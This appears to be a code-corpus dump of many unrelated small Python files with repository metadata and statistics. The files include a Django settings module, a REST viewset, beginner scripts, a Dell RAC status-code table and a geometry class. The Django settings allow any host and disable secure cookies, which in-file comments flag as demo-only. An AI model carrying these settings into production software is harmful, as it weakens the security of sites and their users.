57122052f63bbd054e0ca84d3c6832e6ecb00ec8
[ "MIT" ]
null
null
null
mysite/mysite/settings.py
prnake/search_engine_demo
57122052f63bbd054e0ca84d3c6832e6ecb00ec8
[ "MIT" ]
null
null
null
"""Django settings for the mysite search-engine demo project."""
import os
import environ

env = environ.Env(
    # set casting, default value
    DEBUG=(bool, False)
)
# reading .env file
environ.Env.read_env()

# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))

# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/

# False if not in os.environ
DEBUG = env('DEBUG')

# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = env('SECRET_KEY')

# Space-separated list of admin e-mail addresses from the environment.
ADMIN_EMAIL = str(env('ADMIN_EMAIL')).split(' ')

# NOTE(review): '*' allows any Host header — acceptable for a demo only.
ALLOWED_HOSTS = ['*']

# NOTE(review): SESSION_COOKIE_SECURE is overridden to False further down
# in this file — confirm which value is intended.
SESSION_COOKIE_SECURE = True
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTOCOL', 'https')

# Application definition

INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    "search.apps.SearchConfig",
    "scrapy.apps.ScrapyConfig",
    'captcha',
]

MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]

ROOT_URLCONF = 'mysite.urls'

TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
                'django.template.context_processors.media',
            ],
        },
    },
]

WSGI_APPLICATION = 'mysite.wsgi.application'

# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases

DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}

# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators

AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]

# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/

LANGUAGE_CODE = 'zh-hans'

TIME_ZONE = 'Asia/Shanghai'

USE_I18N = True

USE_L10N = True

USE_TZ = False

CSRF_COOKIE_SECURE = False

# NOTE(review): overrides the True assignment near the top of the file.
SESSION_COOKIE_SECURE = False

MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')

# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/

STATIC_URL = '/static/'

# Captcha
CAPTCHA_IMAGE_SIZE = (80, 28)
CAPTCHA_TIMEOUT = 1
24.91791
91
0.692123
364
3,339
6.203297
0.425824
0.08636
0.052702
0.055359
0.184234
0.147476
0.078388
0.065545
0.03543
0
0
0.008321
0.172207
3,339
133
92
25.105263
0.808611
0.210542
0
0
0
0
0.497706
0.414755
0
0
0
0
0
1
0
false
0.060241
0.024096
0
0.024096
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
null
0
0
0
0
0
0
0
1
0
0
0
0
0
2
5583a4b67ff425c68e23ee2615524b5aa7a257d1
591
py
Python
meiduo1/apps/meiduo_admin/views/user_group.py
woobrain/nginx-uwsgi-web
5b3ca1fba8205c2c0a2b91d951f812f1c30e12ae
[ "MIT" ]
null
null
null
meiduo1/apps/meiduo_admin/views/user_group.py
woobrain/nginx-uwsgi-web
5b3ca1fba8205c2c0a2b91d951f812f1c30e12ae
[ "MIT" ]
2
2021-05-28T19:45:17.000Z
2021-11-02T15:49:34.000Z
meiduo1/apps/meiduo_admin/views/user_group.py
woobrain/nginx-uwsgi-web
5b3ca1fba8205c2c0a2b91d951f812f1c30e12ae
[ "MIT" ]
null
null
null
from django.contrib.auth.models import Group, Permission
from rest_framework.response import Response
from rest_framework.viewsets import ModelViewSet

from .statistical import UserPagination
from apps.meiduo_admin.serializer.user_group import UserGroupSerializer, GroupPerSerializer


class UserGroupView(ModelViewSet):
    """CRUD viewset over auth Groups, plus a plain permission listing."""

    serializer_class = UserGroupSerializer
    queryset = Group.objects.all()
    pagination_class = UserPagination

    def simple(self, request):
        """Return every Permission, serialized without pagination."""
        permissions = Permission.objects.all()
        serializer = GroupPerSerializer(permissions, many=True)
        return Response(serializer.data)
32.833333
91
0.788494
64
591
7.1875
0.578125
0.034783
0.073913
0
0
0
0
0
0
0
0
0
0.147208
591
18
92
32.833333
0.912698
0
0
0
0
0
0
0
0
0
0
0
0
1
0.076923
false
0
0.384615
0
0.846154
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
0
0
2
55948a0d8acfcbe1f96f58b36c1bb83505bd04f6
175
py
Python
first_task.py
yashika0607/Task1_python
4a867227f48f0c8ed9ad418fb412550eef3a7571
[ "Apache-2.0" ]
null
null
null
first_task.py
yashika0607/Task1_python
4a867227f48f0c8ed9ad418fb412550eef3a7571
[ "Apache-2.0" ]
null
null
null
first_task.py
yashika0607/Task1_python
4a867227f48f0c8ed9ad418fb412550eef3a7571
[ "Apache-2.0" ]
null
null
null
# Task 1: area of a circle from a user-supplied radius.
radius = float(input("Enter the radius of the circle?\n"))
pi_approx = 3.143  # keeps the original (rough) approximation of pi
circle_area = pi_approx * radius * radius
print("Area of the circle is ", circle_area)

# Task 2: echo the entered file name with a .py extension.
file_name = input("Enter the file name\n")
print(file_name + ".py")
17.5
51
0.674286
38
175
3.105263
0.578947
0.169492
0.220339
0
0
0
0
0
0
0
0
0.039735
0.137143
175
9
52
19.444444
0.741722
0.068571
0
0
0
0
0.490683
0
0
0
0
0
0
1
0
false
0
0
0
0
0.333333
0
0
0
null
0
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
55a528f7f755e76f01a1fec6c18655befd899209
131
py
Python
Logon.py
fenglihanxiao/multi_test
46ee84aaa36f1d9594ccf7a14caa167dfcd719d5
[ "MIT" ]
null
null
null
Logon.py
fenglihanxiao/multi_test
46ee84aaa36f1d9594ccf7a14caa167dfcd719d5
[ "MIT" ]
null
null
null
Logon.py
fenglihanxiao/multi_test
46ee84aaa36f1d9594ccf7a14caa167dfcd719d5
[ "MIT" ]
null
null
null
# Merge-test scratch module. The original assigned num1=1, num2=20, num3=168
# and then immediately overwrote each one in later "commit" edits; only the
# final values are observable, so the dead stores are removed.
num1 = 1         # unchanged by the later edits
num2 = 88888888  # "resolve conflict" value (was 20)
num3 = 99        # "Test next commit" value (was 168)
8.1875
18
0.641221
20
131
4.2
0.75
0.119048
0
0
0
0
0
0
0
0
0
0.247312
0.290076
131
15
19
8.733333
0.655914
0.381679
0
0.333333
0
0
0
0
0
0
0
0
0
1
0
false
0
0
0
0
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
55a57c64b93ff64ee4143c416e8510e88ce162fa
8,022
py
Python
foulacces.py
Danukeru/FOULACCES
54304c7a91326f9517c45f6981c4ab8de4eb3964
[ "BSD-3-Clause" ]
1
2019-10-21T23:43:21.000Z
2019-10-21T23:43:21.000Z
foulacces.py
Danukeru/FOULACCES
54304c7a91326f9517c45f6981c4ab8de4eb3964
[ "BSD-3-Clause" ]
null
null
null
foulacces.py
Danukeru/FOULACCES
54304c7a91326f9517c45f6981c4ab8de4eb3964
[ "BSD-3-Clause" ]
1
2019-10-21T23:43:29.000Z
2019-10-21T23:43:29.000Z
#!/usr/bin/env python
# NOTE: this module targets Python 2 (httplib); keep running it under py2
# or port httplib -> http.client deliberately.
import os
import sys
import hashlib
import httplib
import base64
import socket
from xml.dom.minidom import *

# Dell RAC (remote access controller) return codes -> human-readable message.
RAC_CODE = {
    'x' : 'Unknown error',
    '0x0' : 'Success',
    '0x4' : 'Number of arguments does not match',
    '0xc' : 'Syntax error in xml2cli command',
    '0x408' : 'Session Timeout',
    '0x43' : 'No such subfunction',
    '0x62' : 'Command not supported on this platform for this firmware',
    '0xb0002' : 'Invalid handle',
    '0x140000' : 'Too many sessions',
    '0x140002' : 'Logout',
    '0x140004' : 'Invalid password',
    '0x140005' : 'Invalid username',
    '0x150008' : 'Too many requests',
    '0x15000a' : 'No such event',
    '0x15000c' : 'No such function',
    '0x15000d' : 'Unimplemented',
    '0x170003' : 'Missing content in POST ?',
    '0x170007' : 'Dont know yet',
    '0x1a0004' : 'Invalid sensorname',
    '0x10150006' : 'Unknown sensor error',
    '0x10150009' : 'Too many sensors in sensorlist',
    '0x20308' : 'Console not available',
    '0x30003' : 'Console not active',
    '0x3000a' : 'Console is in text mode',
    '0x3000b' : 'Console is in VGA graphic mode',
    # Two possible meanings for the same code, kept as a list.
    '0x30011' : [
        'Console is in Linux mode (no ctrl+alt+del)',
        'Console is in Windows or Netware mode'
    ],
    '0xe0003' : 'Unknown serveraction',
    '0xf0001' : 'Offset exceeds number of entries in eventlog',
    '0xf0003' : 'Request exceeds number of entries in eventlog',
    '0xf0004' : 'Invalid number of events requested'
}

# Sensor severity codes -> label.
SEVERITY = {
    'x' : 'Unknown severity. ',
    '' : '-',
    '0x1' : 'Unknown',
    '0x2' : 'OK',
    '0x3' : 'Information',
    '0x4' : 'Recoverable',
    '0x5' : 'Non-Critical',
    '0x6' : 'Critical',
    '0x7' : 'Non-Recoverable',
}

# Sensor IDs known to be bogus on a PowerEdge 1650 (to be ignored).
BOGUS_IDS_1650 = [
    '0x1010018', '0x1020010', '0x1020018', '0x1020062', '0x1030010',
    '0x1030018', '0x1030062', '0x1040010', '0x1040018', '0x1050018',
    '0x1060010', '0x1060018', '0x1060062', '0x1070018', '0x1070062',
    '0x1080010', '0x1080062', '0x1090010', '0x10a0010', '0x10f0062',
    '0x1100010', '0x1110010', '0x1120010', '0x1120062', '0x1130010',
    '0x1140010', '0x1150010', '0x13b0010', '0x13c0010', '0x13f0010',
    '0x14b0010', '0x14d0010', '0x20e0062', '0x2110062', '0x2160061',
    '0x2160062', '0x2170061', '0x2170062', '0x2180061', '0x2180062',
    '0x2190061', '0x2190062', '0x21a0061', '0x21a0062', '0x21b0061',
    '0x21b0062', '0x21e0010', '0x21e0061', '0x21e0062', '0x21f0061',
    '0x21f0062', '0x2210010', '0x2220010', '0x2230010', '0x2240010',
    '0x2250010', '0x2260010', '0x2270010', '0x2280010', '0x2290010',
    '0x22a0010', '0x22b0010', '0x22c0010', '0x22d0010', '0x22e0010',
    '0x22f0010', '0x2300010', '0x2310010', '0x2320010', '0x2330010',
    '0x2340010', '0x2350010', '0x2360010', '0x2370010', '0x2380010',
    '0x2390010', '0x23a0010', '0x23e0010', '0x2410010', '0x2420010',
    '0x2430010', '0x2440010', '0x2450010', '0x2460010', '0x2470010',
    '0x2480010', '0x2530010',
]

# Sensor IDs known to be bogus on a PowerEdge 2650.
BOGUS_IDS_2650 = [
    '0x1350010', '0x1360010', '0x2160061', '0x2170061', '0x2180061',
    '0x2190061', '0x21a0061', '0x21b0061', '0x21c0061', '0x21d0061',
    '0x21e0060', '0x21e0061', '0x21f0060', '0x21f0061', '0x2d00010',
]

# Sensor IDs known to be bogus on a PowerEdge 1750.
BOGUS_IDS_1750 = [
    '0x1060062', '0x1070062', '0x1080062', '0x10f0062', '0x1120062',
    '0x1030062', '0x1020062', '0x20e0062', '0x2110062', '0x2160062',
    '0x2170062', '0x2180062', '0x2190062', '0x21a0062', '0x21b0062',
    '0x21f0062', '0x21e0062', '0x2160061', '0x2170061', '0x2180061',
    '0x2190061', '0x21a0061', '0x21b0061', '0x21f0061', '0x21e0061',
    '0x1010010', '0x1020010', '0x1030010', '0x1040010', '0x1080010',
    '0x1090010', '0x10a0010', '0x1100010', '0x1110010', '0x1120010',
    '0x1130010', '0x1140010', '0x1150010', '0x21e0010', '0x2210010',
    '0x2220010', '0x2230010', '0x2240010', '0x2250010', '0x2260010',
    '0x2290010', '0x22a0010', '0x22b0010', '0x22c0010', '0x22d0010',
    '0x22e0010', '0x22f0010', '0x2300010', '0x2310010', '0x2320010',
    '0x2330010', '0x2340010', '0x2350010', '0x2360010', '0x2370010',
    '0x2380010', '0x2390010', '0x23a0010', '0x13b0010', '0x13c0010',
    '0x13f0010', '0x2440010', '0x2450010', '0x2460010', '0x2470010',
    '0x2480010', '0x14a0010', '0x14d0010', '0x14e0010', '0x1500010',
    '0x1510010', '0x2000010', '0x2570010', '0x10f0060', '0x1120060',
    '0x1020060', '0x1010018', '0x1020018', '0x1030018', '0x1040018',
    '0x1050018', '0x1060018', '0x1070018',
]

# Property names reported per sensor.
PROPNAMES = [
    'NAME',
    'SEVERITY',
    'LOW_CRITICAL',
    'LOW_NON_CRITICAL',
    'VAL',
    'UNITS',
    'UPPER_NON_CRITICAL',
    'UPPER_CRITICAL',
    'SENSOR_TYPE',
]

# Per-sensor-type status code -> label tables.
DRIVE_SLOT_CODES = {
    '0' : 'Good',
    '1' : 'No Error',
    '2' : 'Faulty Drive',
    '4' : 'Drive Rebuilding',
    '8' : 'Drive In Failed Array',
    '16' : 'Drive In Critical Array',
    '32' : 'Parity Check Error',
    '64' : 'Predicted Error',
    '128' : 'No Drive',
}

POWER_UNIT_CODES = {
    '0' : 'AC Power Unit',
    '1' : 'DC Power Unit',
}

BUTTON_CODES = {
    '0' : 'Power Button Disabled',
    '1' : 'Power Button Enabled'
}

FAN_CONTROL_CODES = {
    '0' : 'Normal Operation',
    '1' : 'Unknown',
}

INTRUSION_CODES = {
    '0' : 'No Intrusion',
    '1' : 'Cover Intrusion Detected',
    '2' : 'Bezel Intrusion Detected',
}

POWER_SUPPLY_CODES = {
    '1' : 'Good',
    '2' : 'Failure Detected',
    '4' : 'Failure Predicted',
    '8' : 'Power Lost',
    '16' : 'Not Present',
}

PROCESSOR_CODES = {
    '1' : 'Good',
    '2' : 'Failure Detected',
    '4' : 'Failure Predicted',
    '8' : 'Power Lost',
    '16' : 'Not Present',
}

# Dispatch table: sensor-type name -> its code table.
CODES = {
    'button' : BUTTON_CODES,
    'drive slot' : DRIVE_SLOT_CODES,
    'fan control' : FAN_CONTROL_CODES,
    # BUG FIX: originally referenced the misspelled (undefined) name
    # INSTRUSION_CODES, raising NameError at import time.
    'intrusion' : INTRUSION_CODES,
    'power supply' : POWER_SUPPLY_CODES,
    'power unit' : POWER_UNIT_CODES,
    'processor' : PROCESSOR_CODES,
}
40.11
87
0.446771
547
8,022
6.486289
0.521024
0.008455
0.012401
0.012401
0.232244
0.206877
0.127959
0.127959
0.127959
0.127959
0
0.360154
0.417477
8,022
199
88
40.311558
0.399101
0.002493
0
0.106509
0
0
0.415573
0
0
0
0.241345
0
0
1
0
false
0.005917
0.04142
0
0.04142
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
1
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
55bbcfb0657fa9d696e2cb0dec828c20a4c0e1c7
156
py
Python
rpi/LiDAR.py
shadowsburney/LiDAR
f88cca9fbdae2d0dbe47a6e06cd965a2aaa82a0a
[ "MIT" ]
null
null
null
rpi/LiDAR.py
shadowsburney/LiDAR
f88cca9fbdae2d0dbe47a6e06cd965a2aaa82a0a
[ "MIT" ]
null
null
null
rpi/LiDAR.py
shadowsburney/LiDAR
f88cca9fbdae2d0dbe47a6e06cd965a2aaa82a0a
[ "MIT" ]
null
null
null
from sensor import Sensor
from stepper import Stepper

# Instantiate the distance sensor and the stepper motor driver.
sensor = Sensor()
stepper = Stepper(100)  # presumably steps-per-revolution or speed — TODO confirm

# Motor rotation is currently disabled; only the sensor is polled.
#stepper.start()

# Poll the sensor forever, printing each measurement (Ctrl-C to stop).
while True:
    print(sensor.measure())
13
27
0.730769
20
156
5.7
0.5
0
0
0
0
0
0
0
0
0
0
0.023077
0.166667
156
11
28
14.181818
0.853846
0.096154
0
0
0
0
0
0
0
0
0
0
0
1
0
false
0
0.333333
0
0.333333
0.166667
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
2
55c0c3ecc4384f35e0ec61e90038c58f6fa656b9
89
py
Python
languages/116/examples/test_problem.py
c3333/sphereengine-languages
ef76cbffe67407d88519ba1e4bfaa20e3a55ccff
[ "Apache-2.0" ]
5
2019-05-05T15:47:24.000Z
2021-07-22T14:29:13.000Z
languages/116/examples/test_problem.py
c3333/sphereengine-languages
ef76cbffe67407d88519ba1e4bfaa20e3a55ccff
[ "Apache-2.0" ]
1
2022-03-29T14:20:04.000Z
2022-03-29T14:20:04.000Z
languages/116/examples/test_problem.py
c3333/sphereengine-languages
ef76cbffe67407d88519ba1e4bfaa20e3a55ccff
[ "Apache-2.0" ]
4
2020-02-25T14:30:43.000Z
2021-05-12T10:05:05.000Z
"""Echo integers read from stdin until the value 42 appears (42 itself is not printed)."""
from sys import stdin

for value in map(int, stdin):
    if value == 42:
        break
    print(value)
9.888889
21
0.629213
17
89
3.294118
0.764706
0
0
0
0
0
0
0
0
0
0
0.030769
0.269663
89
8
22
11.125
0.830769
0
0
0
0
0
0
0
0
0
0
0
0
1
0
false
0
0.166667
0
0.166667
0.166667
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
e96b8708dc8be78814c697d042595105e2d873c2
80
py
Python
Getting_Started_With_Raspberry_Pi_Pico/variable/code.py
gamblor21/Adafruit_Learning_System_Guides
f5dab4a758bc82d0bfc3c299683fe89dc093912a
[ "MIT" ]
665
2017-09-27T21:20:14.000Z
2022-03-31T09:09:25.000Z
Getting_Started_With_Raspberry_Pi_Pico/variable/code.py
gamblor21/Adafruit_Learning_System_Guides
f5dab4a758bc82d0bfc3c299683fe89dc093912a
[ "MIT" ]
641
2017-10-03T19:46:37.000Z
2022-03-30T18:28:46.000Z
Getting_Started_With_Raspberry_Pi_Pico/variable/code.py
gamblor21/Adafruit_Learning_System_Guides
f5dab4a758bc82d0bfc3c299683fe89dc093912a
[ "MIT" ]
734
2017-10-02T22:47:38.000Z
2022-03-30T14:03:51.000Z
"""Example of assigning a variable.""" user_name = input("What is your name? ")
26.666667
40
0.6875
12
80
4.5
0.916667
0
0
0
0
0
0
0
0
0
0
0
0.15
80
2
41
40
0.794118
0.4
0
0
0
0
0.452381
0
0
0
0
0
0
1
0
false
0
0
0
0
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
e96f7f5812e754a8c8dec16943815bc6604a8f49
216
py
Python
rxkcd/models.py
aeternalis1/Relevant-XKCD
a9145974453b94ecf77a587b83bd69d974f14380
[ "MIT" ]
null
null
null
rxkcd/models.py
aeternalis1/Relevant-XKCD
a9145974453b94ecf77a587b83bd69d974f14380
[ "MIT" ]
null
null
null
rxkcd/models.py
aeternalis1/Relevant-XKCD
a9145974453b94ecf77a587b83bd69d974f14380
[ "MIT" ]
null
null
null
class Comic: def __init__(self, comic_num): self.id = comic_num self.title = "" self.title_text = "" self.transcript = "" self.explanation = "" self.img_url = "" self.og_title = "" self.og_ttext = ""
21.6
31
0.62963
29
216
4.344828
0.517241
0.126984
0.190476
0
0
0
0
0
0
0
0
0
0.208333
216
10
32
21.6
0.736842
0
0
0
0
0
0
0
0
0
0
0
0
1
0.1
false
0
0
0
0.2
0
1
0
0
null
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
e96ffd9e458abb20cec71135158a8cf1ce09e9d1
888
py
Python
ElevatorBot/commands/funStuff/ticTacToe/vsAI.py
LukasSchmid97/destinyBloodoakStats
1420802ce01c3435ad5c283f44eb4531d9b22c38
[ "MIT" ]
3
2019-10-19T11:24:50.000Z
2021-01-29T12:02:17.000Z
ElevatorBot/commands/funStuff/ticTacToe/vsAI.py
LukasSchmid97/destinyBloodoakStats
1420802ce01c3435ad5c283f44eb4531d9b22c38
[ "MIT" ]
29
2019-10-14T12:26:10.000Z
2021-07-28T20:50:29.000Z
ElevatorBot/commands/funStuff/ticTacToe/vsAI.py
LukasSchmid97/destinyBloodoakStats
1420802ce01c3435ad5c283f44eb4531d9b22c38
[ "MIT" ]
2
2019-10-13T17:11:09.000Z
2020-05-13T15:29:04.000Z
# from discord.ext.commands import Cog # from discord_slash import SlashContext, cog_ext # from discord_slash.utils.manage_commands import create_option # # # class TicTacToeAI(Cog): # def __init__(self, client): # self.client = client # # @cog_ext.cog_subcommand( # base="tictactoe", # base_description="You know and love it - TicTacToe", # name="computer", # description="Try to beat me in a tic tac toe game", # options=[ # create_option( # name="easy_mode", # description="Set this to true if you are too weak for the normal mode", # option_type=5, # required=False, # ), # ], # ) # async def _tictactoe_ai(self, ctx: SlashContext, easy_mode: bool = False): # pass # # # def setup(client): # TicTacToeAI(client)
29.6
89
0.581081
101
888
4.930693
0.613861
0.066265
0.064257
0
0
0
0
0
0
0
0
0.001634
0.310811
888
29
90
30.62069
0.812092
0.933559
0
null
0
null
0
0
null
0
0
0
null
1
null
true
0
0
null
null
null
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
0
0
2
e988aca86693a630d0af6b4768506c2e555391e5
71
py
Python
Atividade do Livro-Nilo Ney(PYTHON)/Cap.03/exe 3.13.py
EduardoJonathan0/Python
0e4dff4703515a6454ba25c6f401960b6155f32f
[ "MIT" ]
null
null
null
Atividade do Livro-Nilo Ney(PYTHON)/Cap.03/exe 3.13.py
EduardoJonathan0/Python
0e4dff4703515a6454ba25c6f401960b6155f32f
[ "MIT" ]
null
null
null
Atividade do Livro-Nilo Ney(PYTHON)/Cap.03/exe 3.13.py
EduardoJonathan0/Python
0e4dff4703515a6454ba25c6f401960b6155f32f
[ "MIT" ]
null
null
null
C = int(input("Insira um valor: ")) Fire = (9 * C / 5) + 32 print(Fire)
23.666667
35
0.56338
13
71
3.076923
0.846154
0
0
0
0
0
0
0
0
0
0
0.071429
0.211268
71
3
36
23.666667
0.642857
0
0
0
0
0
0.236111
0
0
0
0
0
0
1
0
false
0
0
0
0
0.333333
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
e98f3c0cbfe695e09cf6acaf634dcaef0d39ab20
965
py
Python
backend/forms.py
adarshrao1/Flood_detection
4a2a7ecef178366700d5c29a13d45143eaa7cc54
[ "CC0-1.0" ]
null
null
null
backend/forms.py
adarshrao1/Flood_detection
4a2a7ecef178366700d5c29a13d45143eaa7cc54
[ "CC0-1.0" ]
null
null
null
backend/forms.py
adarshrao1/Flood_detection
4a2a7ecef178366700d5c29a13d45143eaa7cc54
[ "CC0-1.0" ]
5
2021-06-05T14:11:04.000Z
2021-06-19T05:51:56.000Z
from django.forms import ModelForm from backend.models import Image, Image2 from django.contrib.auth.forms import UserCreationForm from django.contrib.auth.models import User from django import forms class CreateUserForm(UserCreationForm): email = forms.EmailField( widget=forms.TextInput(attrs={'class': 'form-control', }), ) username = forms.CharField( widget=forms.TextInput(attrs={'class': 'form-control', }), ) password1 = forms.CharField( widget=forms.PasswordInput(attrs={'class': 'form-control', }), ) password2 = forms.CharField( widget=forms.PasswordInput(attrs={'class': 'form-control', }), ) class Meta: model = User fields = ['username', 'email', 'password1', 'password2'] class ImageForm(ModelForm): class Meta: model = Image fields = "__all__" class ImageForm2(ModelForm): class Meta: model = Image2 fields = "__all__"
26.081081
70
0.654922
99
965
6.30303
0.333333
0.064103
0.089744
0.134615
0.320513
0.320513
0.320513
0.189103
0.189103
0
0
0.009309
0.220725
965
36
71
26.805556
0.820479
0
0
0.310345
0
0
0.117098
0
0
0
0
0
0
1
0
false
0.172414
0.172414
0
0.517241
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
1
0
0
2
e9a7d2f66b4f8dbaa2eb22e345ef51c2d6c7fe14
2,360
py
Python
src/Line.py
npanuhin/BIOCAD-BWA
50f56fd7d08b8ad1247934c902fb137f3c28cdf8
[ "MIT" ]
null
null
null
src/Line.py
npanuhin/BIOCAD-BWA
50f56fd7d08b8ad1247934c902fb137f3c28cdf8
[ "MIT" ]
null
null
null
src/Line.py
npanuhin/BIOCAD-BWA
50f56fd7d08b8ad1247934c902fb137f3c28cdf8
[ "MIT" ]
null
null
null
from typing import List from collections import deque class Line: """ Properties: start_x {0} start_y {1} end_x {2} end_y {3} dots = [dot1, ..., dotN] {4} coords = (start_x, start_y, end_x, end_y) """ def __init__(self, start_x=None, start_y=None, end_x=None, end_y=None, dots=[]): self.start_x = start_x self.start_y = start_y self.end_x = end_x self.end_y = end_y self.dots = dots def __repr__(self): return "Line(start_x={}, start_y={}, end_x={}, end_y={}, dots=[{}])".format( self.start_x, self.start_y, self.end_x, self.end_y, len(self.dots) ) @property def coords(self): return self.start_x, self.start_y, self.end_x, self.end_y # @property # def x1(self): # return self.start_x # @property # def y1(self): # return self.start_y # @property # def x2(self): # return self.end_x # @property # def y2(self): # return self.end_y @property def center_x(self): return (self.start_x + self.end_x) // 2 @property def center_y(self): return (self.start_y + self.end_y) // 2 def isTiltedCorrectly(self): return self.start_y <= self.end_y @property def k(self): return (self.end_y - self.start_y) / (self.end_x - self.start_x) @property def b(self): return self.end_y - self.end_x * self.k def copyCoords(self): return Line(self.start_x, self.start_y, self.end_x, self.end_y, dots=[]) def shift(self, dx=0, dy=0): self.start_x += dx self.start_y += dy self.end_x += dx self.end_y += dy for i in range(len(self.dots)): self.dots[i][0] += dx self.dots[i][1] += dy def rotateY(self, rotation_center, line=True, dots=False): if line: self.start_y -= (self.start_y - rotation_center) * 2 self.end_y -= (self.end_y - rotation_center) * 2 if dots: for i in range(len(self.dots)): self.dots[i][1] -= (self.dots[i][1] - rotation_center) * 2 def shiftLines(lines, count) -> List[Line]: result = deque(lines) for _ in range(count): result.append(result.popleft()) return list(result)
25.106383
84
0.555932
347
2,360
3.564842
0.167147
0.118836
0.077607
0.073565
0.44139
0.292643
0.232821
0.215036
0.137429
0.137429
0
0.012868
0.308475
2,360
93
85
25.376344
0.745098
0.147034
0
0.134615
0
0
0.030071
0
0
0
0
0
0
1
0.230769
false
0
0.038462
0.153846
0.461538
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
0
0
0
2
e9bd8c135bbdae40ce2ed51669ba9beb880235de
561
py
Python
typeidea/comment/adminx.py
LastDanceG/typeblog
fdd043546813866669c004bc8d8aedbfcfa326f2
[ "MIT" ]
1
2020-02-20T12:01:43.000Z
2020-02-20T12:01:43.000Z
typeidea/comment/adminx.py
LastDanceG/typeblog
fdd043546813866669c004bc8d8aedbfcfa326f2
[ "MIT" ]
2
2020-06-06T00:45:15.000Z
2021-06-10T22:35:31.000Z
typeidea/comment/adminx.py
LastDanceG/typeblog
fdd043546813866669c004bc8d8aedbfcfa326f2
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- from __future__ import unicode_literals import xadmin from django.contrib import admin # from typeidea.custom_site import custom_site from typeidea.custom_admin import BaseOwnerAdmin from .models import Comment # Register your models here. class CommentAdmin(object): list_display = ['target', 'nickname', 'status', 'website', 'email', 'create_time'] search_fields = ['nickname', 'status'] actions_on_top = True actions_on_bottom = True date_hierarchy = 'create_time' xadmin.site.register(Comment, CommentAdmin)
26.714286
86
0.750446
69
561
5.855072
0.608696
0.059406
0.089109
0
0
0
0
0
0
0
0
0.002092
0.14795
561
21
87
26.714286
0.843096
0.165775
0
0
0
0
0.146237
0
0
0
0
0
0
1
0
false
0
0.416667
0
0.916667
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
0
0
2
e9da66e1d85822aa027c49a94455e58540701de1
7,156
py
Python
iec/iec_lookup/tests/test_integration_services.py
divinedeveloper/iec-web-service
0d5e7a05356cc8d88372a559bd5df787d8dc1f75
[ "MIT" ]
null
null
null
iec/iec_lookup/tests/test_integration_services.py
divinedeveloper/iec-web-service
0d5e7a05356cc8d88372a559bd5df787d8dc1f75
[ "MIT" ]
null
null
null
